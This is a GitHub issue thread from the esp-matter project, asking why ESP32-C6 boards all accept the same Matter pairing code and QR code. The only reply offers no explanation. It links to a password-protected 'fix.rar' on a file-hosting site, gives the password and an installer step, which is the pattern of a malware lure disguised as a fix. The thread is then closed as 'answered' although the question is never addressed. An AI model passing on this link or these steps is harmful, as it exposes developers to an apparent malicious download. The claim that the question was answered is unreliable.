espressif/esp-matter #1065: Why isn't there a unique pairing code and QR code for my device for commissioning

pavel808, 2024-08-27:
Hi. I am working with the ESP32-C6 SOC. Initially I had a DevKitM-1. When commissioning via Matter / Thread, I use the same manual pairing code 34970112332 or QR code MT:Y.K9042C00KA0648G00 , which seems to work for on-boarding any device regardless.

I am now using a Seeed Studio XIAO ESP32C6 board : https://www.seeedstudio.com/Seeed-Studio-XIAO-ESP32C6-p-5884.html?srsltid=AfmBOorS5QEleHkbHI_z4ykdyN3D3ocP4Gp_UKGat5OMCPj75x7cxmD1

The same manual pairing code 34970112332 works with any of these devices. 

I am a bit confused here. I thought that each Matter device comes with it its own unique codes for pairing / commissioning, based on vendor and product IDs ? 

How can I ensure that each of my devices gets a unique pairing and QR code?  Thanks in advance?

yldzmuhammed, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

dhrishi, 2024-09-12:
Closing as the question is answered

closed 2024-09-12 by dhrishi